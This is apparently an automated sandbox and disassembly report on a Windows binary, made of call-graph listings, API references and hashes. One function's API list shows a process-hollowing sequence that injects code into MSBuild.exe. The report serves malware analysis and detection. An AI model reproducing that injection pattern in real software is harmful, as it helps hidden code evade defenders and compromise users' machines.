c3323 10134->10141 10137 c33cb WriteFile 10135->10137 10138 c3376 10135->10138 10142 c3608 ___scrt_uninitialize_crt 54 API calls 10136->10142 10143 c33ed GetLastError 10137->10143 10137->10150 10139 c337e 10138->10139 10140 c33b7 10138->10140 10144 c33a3 10139->10144 10145 c3383 10139->10145 10147 c3a37 ___scrt_uninitialize_crt 7 API calls 10140->10147 10146 c39cf ___scrt_uninitialize_crt 6 API calls 10141->10146 10141->10150 10142->10150 10143->10150 10148 c3bfb ___scrt_uninitialize_crt 8 API calls 10144->10148 10149 c3b12 ___scrt_uninitialize_crt 7 API calls 10145->10149 10145->10150 10146->10150 10147->10150 10148->10150 10149->10150 10150->10120 10152 c291a ___scrt_uninitialize_crt LeaveCriticalSection 10151->10152 10153 c3589 10152->10153 10153->10123 10155 c31c8 __FrameHandler3::FrameUnwindToState 10154->10155 10167 c28f7 EnterCriticalSection 10155->10167 10157 c31d7 10166 c321c 10157->10166 10168 c26ae 10157->10168 10159 c0777 __strnicoll 14 API calls 10160 c3223 10159->10160 10181 c3252 10160->10181 10161 c3203 FlushFileBuffers 10161->10160 10162 c320f GetLastError 10161->10162 10164 c078a __dosmaperr 14 API calls 10162->10164 10164->10166 10166->10159 10167->10157 10169 c26bb 10168->10169 10170 c26d0 10168->10170 10171 c078a __dosmaperr 14 API calls 10169->10171 10173 c078a __dosmaperr 14 API calls 10170->10173 10175 c26f5 10170->10175 10172 c26c0 10171->10172 10174 c0777 __strnicoll 14 API calls 10172->10174 10176 c2700 10173->10176 10177 c26c8 10174->10177 10175->10161 10178 c0777 __strnicoll 14 API calls 10176->10178 10177->10161 10179 c2708 10178->10179 10180 bcd89 __strnicoll 48 API calls 10179->10180 10180->10177 10182 c291a ___scrt_uninitialize_crt LeaveCriticalSection 10181->10182 10183 c323b 10182->10183 10183->10112 10184->10088 10185->10071 10186 aa010 10187 aa03b 10186->10187 10188 bbef5 21 API calls 10187->10188 10189 aa04f 10188->10189 10200 a8190 10208 bd3e7 10200->10208 10202 a9e5a 10203 b9261 CatchGuardHandler 5 API calls 10202->10203 10204 a9e66 10203->10204 10205 a81ea std::bad_exception::bad_exception 10205->10202 10206 a9e80 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10205->10206 10207 bd3cc ___std_exception_destroy 14 API calls 10205->10207 10206->10205 10207->10205 10213 c0c65 __dosmaperr 10208->10213 10209 c0ca3 10210 c0777 __strnicoll 14 API calls 10209->10210 10212 c0ca1 10210->10212 10211 c0c8e RtlAllocateHeap 10211->10212 10211->10213 10212->10205 10213->10209 10213->10211 10214 bc227 __dosmaperr 2 API calls 10213->10214 10214->10213 10325 bbc10 10326 c04c7 ___scrt_uninitialize_crt 77 API calls 10325->10326 10327 bbc18 10326->10327 10335 c0884 10327->10335 10329 bbc1d 10345 c092f 10329->10345 10332 bbc47 10333 c00eb ___free_lconv_mon 14 API calls 10332->10333 10334 bbc52 10333->10334 10336 c0890 __FrameHandler3::FrameUnwindToState 10335->10336 10349 bd181 EnterCriticalSection 10336->10349 10338 c0907 10356 c0926 10338->10356 10339 c089b 10339->10338 10341 c08db DeleteCriticalSection 10339->10341 10350 c3d83 10339->10350 10344 c00eb ___free_lconv_mon 14 API calls 10341->10344 10344->10339 10346 bbc2c DeleteCriticalSection 10345->10346 10347 c0946 10345->10347 10346->10329 10346->10332 10347->10346 10348 c00eb ___free_lconv_mon 14 API calls 10347->10348 10348->10346 10349->10339 10351 c3d96 __strnicoll 10350->10351 10359 c3e41 10351->10359 10353 c3da2 10354 bcff7 __strnicoll 48 API calls 10353->10354 10355 c3dae 10354->10355 10355->10339 10431 bd198 LeaveCriticalSection 10356->10431 10358 c0913 10358->10329 10360 c3e4d __FrameHandler3::FrameUnwindToState 10359->10360 10361 c3e7a 10360->10361 10362 c3e57 10360->10362 10364 c3e72 10361->10364 10370 bbb0f EnterCriticalSection 10361->10370 10363 bcf32 __strnicoll 29 API calls 10362->10363 10363->10364 10364->10353 10366 c3e98 10371 c3db3 10366->10371 10368 c3ea5 10385 c3ed0 10368->10385 10370->10366 10372 c3dc0 10371->10372 10374 c3de3 10371->10374 10373 bcf32 __strnicoll 29 API calls 10372->10373 10375 c3ddb 10373->10375 10374->10375 10376 c0535 ___scrt_uninitialize_crt 73 API calls 10374->10376 10375->10368 10377 c3dfb 10376->10377 10378 c092f 14 API calls 10377->10378 10379 c3e03 10378->10379 10380 c2956 ___scrt_uninitialize_crt 48 API calls 10379->10380 10381 c3e0f 10380->10381 10388 c503b 10381->10388 10384 c00eb ___free_lconv_mon 14 API calls 10384->10375 10430 bbb23 LeaveCriticalSection 10385->10430 10387 c3ed6 10387->10364 10389 c5064 10388->10389 10394 c3e16 10388->10394 10390 c50b3 10389->10390 10392 c508b 10389->10392 10391 bcf32 __strnicoll 29 API calls 10390->10391 10391->10394 10395 c50de 10392->10395 10394->10375 10394->10384 10396 c50ea __FrameHandler3::FrameUnwindToState 10395->10396 10403 c28f7 EnterCriticalSection 10396->10403 10398 c50f8 10401 c5129 10398->10401 10404 c4f9b 10398->10404 10417 c5163 10401->10417 10403->10398 10405 c26ae ___scrt_uninitialize_crt 48 API calls 10404->10405 10406 c4fab 10405->10406 10407 c4fb1 10406->10407 10408 c4fe3 10406->10408 10410 c26ae ___scrt_uninitialize_crt 48 API calls 10406->10410 10420 c2718 10407->10420 10408->10407 10411 c26ae ___scrt_uninitialize_crt 48 API calls 10408->10411 10412 c4fda 10410->10412 10413 c4fef CloseHandle 10411->10413 10414 c26ae ___scrt_uninitialize_crt 48 API calls 10412->10414 10413->10407 10415 c4ffb GetLastError 10413->10415 10414->10408 10415->10407 10416 c5009 ___scrt_uninitialize_crt 10416->10401 10429 c291a LeaveCriticalSection 10417->10429 10419 c514c 10419->10394 10421 c278e 10420->10421 10422 c2727 10420->10422 10423 c0777 __strnicoll 14 API calls 10421->10423 10422->10421 10428 c2751 10422->10428 10424 c2793 10423->10424 10425 c078a __dosmaperr 14 API calls 10424->10425 10426 c277e 10425->10426 10426->10416 10427 c2778 SetStdHandle 10427->10426 10428->10426 10428->10427 10429->10419 10430->10387 10431->10358 10439 bf610 10440 bf61c __FrameHandler3::FrameUnwindToState 10439->10440 10451 bd181 EnterCriticalSection 10440->10451 10442 bf623 10452 c2859 10442->10452 10449 bf752 2 API calls 10450 bf641 10449->10450 10471 bf667 10450->10471 10451->10442 10453 c2865 __FrameHandler3::FrameUnwindToState 10452->10453 10454 c286e 10453->10454 10455 c288f 10453->10455 10456 c0777 __strnicoll 14 API calls 10454->10456 10474 bd181 EnterCriticalSection 10455->10474 10458 c2873 10456->10458 10460 bcd89 __strnicoll 48 API calls 10458->10460 10459 c289b 10464 c28c7 10459->10464 10475 c27a9 10459->10475 10463 bf632 10460->10463 10463->10450 10465 bf69c GetStartupInfoW 10463->10465 10482 c28ee 10464->10482 10466 bf63c 10465->10466 10467 bf6b9 10465->10467 10466->10449 10467->10466 10468 c2859 49 API calls 10467->10468 10469 bf6e1 10468->10469 10469->10466 10470 bf711 GetFileType 10469->10470 10470->10469 10486 bd198 LeaveCriticalSection 10471->10486 10473 bf652 10474->10459 10476 c0827 __dosmaperr 14 API calls 10475->10476 10478 c27bb 10476->10478 10477 c27c8 10479 c00eb ___free_lconv_mon 14 API calls 10477->10479 10478->10477 10480 bec31 6 API calls 10478->10480 10481 c281d 10479->10481 10480->10478 10481->10459 10485 bd198 LeaveCriticalSection 10482->10485 10484 c28f5 10484->10463 10485->10484 10486->10473 10629 ba630 10630 ba638 10629->10630 10648 bd30a 10630->10648 10632 ba643 10655 ba110 10632->10655 10634 ba464 4 API calls 10636 ba6da 10634->10636 10635 ba658 __RTC_Initialize 10646 ba6b5 10635->10646 10661 b9f8a 10635->10661 10638 ba671 10664 bc3c5 10638->10664 10642 ba687 10695 ba953 10642->10695 10644 ba6aa 10701 bc2c4 10644->10701 10646->10634 10647 ba6d2 10646->10647 10649 bd319 10648->10649 10650 bd33c 10648->10650 10649->10650 10651 c0777 __strnicoll 14 API calls 10649->10651 10650->10632 10652 bd32c 10651->10652 10653 bcd89 __strnicoll 48 API calls 10652->10653 10654 bd337 10653->10654 10654->10632 10656 ba11c 10655->10656 10657 ba120 10655->10657 10656->10635 10658 ba464 4 API calls 10657->10658 10660 ba12d ___scrt_release_startup_lock 10657->10660 10659 ba196 10658->10659 10660->10635 10708 b9f9f 10661->10708 10665 bc41f 10664->10665 10666 bc457 10665->10666 10668 bc441 10665->10668 10687 ba67c 10665->10687 10667 bf8a0 58 API calls 10666->10667 10669 bc45d 10667->10669 10670 c0777 __strnicoll 14 API calls 10668->10670 10743 c1a98 GetModuleFileNameW 10669->10743 10671 bc446 10670->10671 10673 bcd89 __strnicoll 48 API calls 10671->10673 10673->10687 10679 bc4b9 10681 c0777 __strnicoll 14 API calls 10679->10681 10680 bc4c5 10682 bc55c 48 API calls 10680->10682 10683 bc4be 10681->10683 10684 bc4db 10682->10684 10686 c00eb ___free_lconv_mon 14 API calls 10683->10686 10684->10683 10685 bc4ff 10684->10685 10688 bc520 10685->10688 10689 bc516 10685->10689 10686->10687 10687->10646 10694 ba938 InitializeSListHead 10687->10694 10691 c00eb ___free_lconv_mon 14 API calls 10688->10691 10690 c00eb ___free_lconv_mon 14 API calls 10689->10690 10692 bc51e 10690->10692 10691->10692 10693 c00eb ___free_lconv_mon 14 API calls 10692->10693 10693->10687 10694->10642 10799 bc6d0 10695->10799 10697 ba964 10698 ba96b 10697->10698 10699 ba464 4 API calls 10697->10699 10698->10644 10700 ba973 10699->10700 10702 bf02a _unexpected 48 API calls 10701->10702 10703 bc2cf 10702->10703 10704 bc307 10703->10704 10705 c0777 __strnicoll 14 API calls 10703->10705 10704->10646 10706 bc2fc 10705->10706 10707 bcd89 __strnicoll 48 API calls 10706->10707 10707->10704 10709 b9fae 10708->10709 10710 b9fb5 10708->10710 10714 bc7c9 10709->10714 10717 bc758 10710->10717 10713 b9f95 10713->10638 10715 bc758 51 API calls 10714->10715 10716 bc7db 10715->10716 10716->10713 10720 bc9bb 10717->10720 10721 bc9c7 __FrameHandler3::FrameUnwindToState 10720->10721 10728 bd181 EnterCriticalSection 10721->10728 10723 bc9d5 10729 bc7df 10723->10729 10725 bc9e2 10739 bca0a 10725->10739 10728->10723 10730 bc7fa 10729->10730 10731 bc86d __dosmaperr 10729->10731 10730->10731 10732 bc84d 10730->10732 10733 c20e4 51 API calls 10730->10733 10731->10725 10732->10731 10734 c20e4 51 API calls 10732->10734 10735 bc843 10733->10735 10736 bc863 10734->10736 10737 c00eb ___free_lconv_mon 14 API calls 10735->10737 10738 c00eb ___free_lconv_mon 14 API calls 10736->10738 10737->10732 10738->10731 10742 bd198 LeaveCriticalSection 10739->10742 10741 bc789 10741->10713 10742->10741 10744 c1ad8 10743->10744 10745 c1ac7 GetLastError 10743->10745 10747 c1294 48 API calls 10744->10747 10746 c079d __dosmaperr 14 API calls 10745->10746 10748 c1ad3 10746->10748 10749 c1b09 10747->10749 10751 b9261 CatchGuardHandler 5 API calls 10748->10751 10765 c1b74 10749->10765 10752 bc470 10751->10752 10753 bc55c 10752->10753 10755 bc582 10753->10755 10757 bc5e0 10755->10757 10793 c1c36 10755->10793 10756 bc4a3 10759 bc3d0 10756->10759 10757->10756 10758 c1c36 48 API calls 10757->10758 10758->10757 10760 bc413 10759->10760 10761 bc3e1 10759->10761 10760->10679 10760->10680 10761->10760 10762 c0827 __dosmaperr 14 API calls 10761->10762 10763 bc40a 10762->10763 10764 c00eb ___free_lconv_mon 14 API calls 10763->10764 10764->10760 10766 c1b90 10765->10766 10767 c1b81 10765->10767 10768 c1bbd 10766->10768 10769 c1b98 10766->10769 10767->10748 10770 c2151 ___scrt_uninitialize_crt WideCharToMultiByte 10768->10770 10769->10767 10786 c1b39 10769->10786 10772 c1bcd 10770->10772 10773 c1bea 10772->10773 10774 c1bd4 GetLastError 10772->10774 10777 c1b39 14 API calls 10773->10777 10780 c1bfb 10773->10780 10775 c079d __dosmaperr 14 API calls 10774->10775 10776 c1be0 10775->10776 10779 c0777 __strnicoll 14 API calls 10776->10779 10777->10780 10779->10767 10780->10767 10790 c15b4 10780->10790 10782 c1c15 GetLastError 10783 c079d __dosmaperr 14 API calls 10782->10783 10784 c1c21 10783->10784 10785 c0777 __strnicoll 14 API calls 10784->10785 10785->10767 10787 c1b44 10786->10787 10788 c0777 __strnicoll 14 API calls 10787->10788 10789 c1b4d 10788->10789 10789->10767 10791 c2151 ___scrt_uninitialize_crt WideCharToMultiByte 10790->10791 10792 c15d1 10791->10792 10792->10767 10792->10782 10796 c1c4e 10793->10796 10797 bf8e8 __strnicoll 48 API calls 10796->10797 10798 c1c49 10797->10798 10798->10755 10800 bc6ee 10799->10800 10801 bc70e 10799->10801 10802 c0777 __strnicoll 14 API calls 10800->10802 10801->10697 10803 bc704 10802->10803 10804 bcd89 __strnicoll 48 API calls 10803->10804 10804->10801 10814 bc330 10817 bc357 10814->10817 10818 bc363 __FrameHandler3::FrameUnwindToState 10817->10818 10825 bd181 EnterCriticalSection 10818->10825 10820 bc39b 10826 bc3b9 10820->10826 10821 bc36d 10821->10820 10823 c121a __strnicoll 14 API calls 10821->10823 10823->10821 10825->10821 10829 bd198 LeaveCriticalSection 10826->10829 10828 bc355 10829->10828 11289 bfcc2 11292 bd198 LeaveCriticalSection 11289->11292 11291 bfcc9 11292->11291 10190 aa050 CreateFileA 10197 aa0cd 10190->10197 10191 aa236 CloseHandle 10191->10197 10192 ab121 CloseHandle 10192->10197 10193 ab15f 10195 b9261 CatchGuardHandler 5 API calls 10193->10195 10194 aa260 ReadFile 10194->10197 10196 ab177 10195->10196 10197->10191 10197->10192 10197->10193 10197->10194 10198 aa1fe GetFileSize 10197->10198 10199 ab140 CloseHandle 10197->10199 10198->10197 10199->10197 11357 bf2d0 11358 bf2db 11357->11358 11359 bf2eb 11357->11359 11363 bf3d5 11358->11363 11362 c00eb ___free_lconv_mon 14 API calls 11362->11359 11364 bf3ea 11363->11364 11365 bf3f0 11363->11365 11366 c00eb ___free_lconv_mon 14 API calls 11364->11366 11367 c00eb ___free_lconv_mon 14 API calls 11365->11367 11366->11365 11368 bf3fc 11367->11368 11369 c00eb ___free_lconv_mon 14 API calls 11368->11369 11370 bf407 11369->11370 11371 c00eb ___free_lconv_mon 14 API calls 11370->11371 11372 bf412 11371->11372 11373 c00eb ___free_lconv_mon 14 API calls 11372->11373 11374 bf41d 11373->11374 11375 c00eb ___free_lconv_mon 14 API calls 11374->11375 11376 bf428 11375->11376 11377 c00eb ___free_lconv_mon 14 API calls 11376->11377 11378 bf433 11377->11378 11379 c00eb ___free_lconv_mon 14 API calls 11378->11379 11380 bf43e 11379->11380 11381 c00eb ___free_lconv_mon 14 API calls 11380->11381 11382 bf449 11381->11382 11383 c00eb ___free_lconv_mon 14 API calls 11382->11383 11384 bf457 11383->11384 11389 bf54e 11384->11389 11390 bf55a __FrameHandler3::FrameUnwindToState 11389->11390 11405 bd181 EnterCriticalSection 11390->11405 11392 bf58e 11406 bf5ad 11392->11406 11393 bf564 11393->11392 11396 c00eb ___free_lconv_mon 14 API calls 11393->11396 11396->11392 11397 bf5b9 11398 bf5c5 __FrameHandler3::FrameUnwindToState 11397->11398 11410 bd181 EnterCriticalSection 11398->11410 11400 bf5cf 11401 bf2f1 __dosmaperr 14 API calls 11400->11401 11402 bf5e2 11401->11402 11411 bf602 11402->11411 11405->11393 11409 bd198 LeaveCriticalSection 11406->11409 11408 bf47d 11408->11397 11409->11408 11410->11400 11414 bd198 LeaveCriticalSection 11411->11414 11413 bf2e3 11413->11362 11414->11413

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,000D00FF,000D00EF), ref: 000D0323
                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 000D0336
                                                                    • Wow64GetThreadContext.KERNEL32(00000130,00000000), ref: 000D0354
                                                                    • ReadProcessMemory.KERNELBASE(00000134,?,000D0143,00000004,00000000), ref: 000D0378
                                                                    • VirtualAllocEx.KERNELBASE(00000134,?,?,00003000,00000040), ref: 000D03A3
                                                                    • WriteProcessMemory.KERNELBASE(00000134,00000000,?,?,00000000,?), ref: 000D03FB
                                                                    • WriteProcessMemory.KERNELBASE(00000134,00400000,?,?,00000000,?,00000028), ref: 000D0446
                                                                    • WriteProcessMemory.KERNELBASE(00000134,?,?,00000004,00000000), ref: 000D0484
                                                                    • Wow64SetThreadContext.KERNEL32(00000130,02D60000), ref: 000D04C0
                                                                    • ResumeThread.KERNELBASE(00000130), ref: 000D04CF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                    • API String ID: 2687962208-3857624555
                                                                    • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                    • Instruction ID: 33d964689b90ea34fd4c48bf350b829f22ff7dce79c2b86ad882b2fabb67c207
                                                                    • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                    • Instruction Fuzzy Hash: 4CB1097660164AAFDB60CF68CC80BDA73A5FF88714F158515EA0CAB341D770FA51CBA4

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 26 aa050-aa0c6 CreateFileA 27 aa0cd-aa0db 26->27 28 aa2d3-aa529 27->28 29 aa0e1-aa0ee 27->29 31 ab19a 28->31 32 aa236-aa250 CloseHandle 29->32 33 aa0f4-aa101 29->33 31->27 32->31 35 aa1ee-aa1f9 33->35 36 aa107-aa114 33->36 35->31 38 aa11a-aa127 36->38 39 aa1cf-aa1e9 36->39 41 aa12d-aa13a 38->41 42 ab121-ab13b CloseHandle 38->42 39->31 44 aa2b0-aa2ce 41->44 45 aa140-aa14d 41->45 42->31 44->31 47 aa153-aa160 45->47 48 aa255-aa2ab call b9253 ReadFile 45->48 51 ab15f-ab187 call b9261 47->51 52 aa166-aa173 47->52 48->31 57 aa179-aa186 52->57 58 aa52e-ab110 call b925c 52->58 61 ab188-ab193 call b925c 57->61 62 aa18c-aa199 57->62 58->31 61->31 67 aa1fe-aa231 GetFileSize 62->67 68 aa19f-aa1ac 62->68 67->31 70 aa1b2-aa1bf 68->70 71 ab115-ab11c 68->71 73 ab140-ab15a CloseHandle 70->73 74 aa1c5-aa1ca 70->74 71->31 73->31 74->31
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFileHandle
                                                                    • String ID: (&#b
                                                                    • API String ID: 3498533004-1696011658
                                                                    • Opcode ID: 0be797dbd31db4326abeb66adeff9d4da849028b53194d647b844c119732d7d2
                                                                    • Instruction ID: 073af5b64baf14b8e9382ebdca82268ac01379267de09354dc43cc0be6785d23
                                                                    • Opcode Fuzzy Hash: 0be797dbd31db4326abeb66adeff9d4da849028b53194d647b844c119732d7d2
                                                                    • Instruction Fuzzy Hash: 16B27976A546944FEF014AB884B93DF6FF24B6B330F2A6756C6A05F2D3D50B000ADB54

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 172 a8190-a81fc call bd3e7 175 a8206-a821a 172->175 176 a8468-a8515 175->176 177 a8220-a8230 175->177 178 a9e71 176->178 180 a9e4b-a9e55 177->180 181 a8236-a8246 177->181 178->175 180->178 183 a855f-a8683 call a9e80 181->183 184 a824c-a825c 181->184 183->178 188 a838a-a83a6 184->188 189 a8262-a8272 184->189 188->178 191 a8278-a8288 189->191 192 a8429-a8463 189->192 194 a828e-a829e 191->194 195 a8407-a8424 191->195 192->178 197 a853d-a855a 194->197 198 a82a4-a82b4 194->198 195->178 197->178 200 a9e5a-a9e70 call b9261 198->200 201 a82ba-a82ca 198->201 205 a83ab-a83da call bb830 call bd3cc 201->205 206 a82d0-a82e0 201->206 218 a83df-a83e9 205->218 209 a876a-a9d97 call a9e80 206->209 210 a82e6-a82f6 206->210 209->178 215 a83ee-a8402 210->215 216 a82fc-a830c 210->216 215->178 220 a8312-a8322 216->220 221 a8746-a8765 216->221 218->178 223 a8328-a8338 220->223 224 a872d-a8741 220->224 221->178 226 a851a-a8538 223->226 227 a833e-a834e 223->227 224->178 226->178 229 a8688-a8705 227->229 230 a8354-a8364 227->230 229->178 232 a870a-a8728 230->232 233 a836a-a837a 230->233 232->178 235 a9d9c-a9e46 233->235 236 a8380-a8385 233->236 235->178 236->178
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 70VZ
                                                                    • API String ID: 0-260880556
                                                                    • Opcode ID: bb3c5f75ca352ec822c96cd5c97836f4e5b85f6aaca70610a3f0e33448f159b1
                                                                    • Instruction ID: ee4d7631d0171838a4a843cc62d889131597972c2c996d899e93aff86c01b0b5
                                                                    • Opcode Fuzzy Hash: bb3c5f75ca352ec822c96cd5c97836f4e5b85f6aaca70610a3f0e33448f159b1
                                                                    • Instruction Fuzzy Hash: 4EF221B1E155188BDB68CF29CC957A9B7B2AFC9320F1583DDA12E672D4CB305E818F44
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e59e558455958201d47abeef7661d93e132f0b61a3d1644ef0153e29dd90ba33
                                                                    • Instruction ID: 8854755d6ab980847bcb9fc8dfe19ec5692bd5f94179c17a4f0e71a2d0cfce09
                                                                    • Opcode Fuzzy Hash: e59e558455958201d47abeef7661d93e132f0b61a3d1644ef0153e29dd90ba33
                                                                    • Instruction Fuzzy Hash: 2101C4749143188FCB14DF68D885BD9F7F4EB18310F4585AAA88897351EB78AA84CF81

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 76 bedf3-bedff 77 bee91-bee94 76->77 78 bee9a 77->78 79 bee04-bee15 77->79 80 bee9c-beea0 78->80 81 bee22-bee3b LoadLibraryExW 79->81 82 bee17-bee1a 79->82 85 bee3d-bee46 GetLastError 81->85 86 beea1-beeb1 81->86 83 beeba-beebc 82->83 84 bee20 82->84 83->80 88 bee8e 84->88 89 bee48-bee5a call c0cb3 85->89 90 bee7f-bee8c 85->90 86->83 87 beeb3-beeb4 FreeLibrary 86->87 87->83 88->77 89->90 93 bee5c-bee6e call c0cb3 89->93 90->88 93->90 96 bee70-bee7d LoadLibraryExW 93->96 96->86 96->90
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,D4CEDC35,?,000BEF02,?,?,00000000), ref: 000BEEB4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697911255.00000000000D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697924918.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697937558.00000000000D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3664257935-537541572
                                                                    • Opcode ID: 9d3f69c1b82c33ecf47b85e70cca97b18222e59bb337a783388b55faf7aaf516
                                                                    • Instruction ID: 41065397bc01bb1aac882ee5d762f3d06de099040836a1d534ef3e1b8d6f6154
                                                                    • Opcode Fuzzy Hash: 9d3f69c1b82c33ecf47b85e70cca97b18222e59bb337a783388b55faf7aaf516
                                                                    • Instruction Fuzzy Hash: A4210331A01291ABDB219B60DC85FDE37A9AF417B0F250125FD26AB2D1DB34ED01C6E0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 97 bbd06-bbd11 98 bbd13-bbd26 call c0777 call bcd89 97->98 99 bbd27-bbd3a call bbd97 97->99 104 bbd68 99->104 105 bbd3c-bbd59 CreateThread 99->105 109 bbd6a-bbd76 call bbde7 104->109 107 bbd5b-bbd67 GetLastError call c079d 105->107 108 bbd77-bbd7c 105->108 107->104 113 bbd7e-bbd81 108->113 114 bbd83-bbd87 108->114 113->114 114->109
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(?,?,Function_0001BE20,00000000,?,?), ref: 000BBD4F
                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,000B6EAA), ref: 000BBD5B
                                                                    • __dosmaperr.LIBCMT ref: 000BBD62
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1697858605.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1697837964.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697882973.00000000000C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1697897620.00000000000D0000.00000040.00000001.01000000.00000003.sdmpDownload File
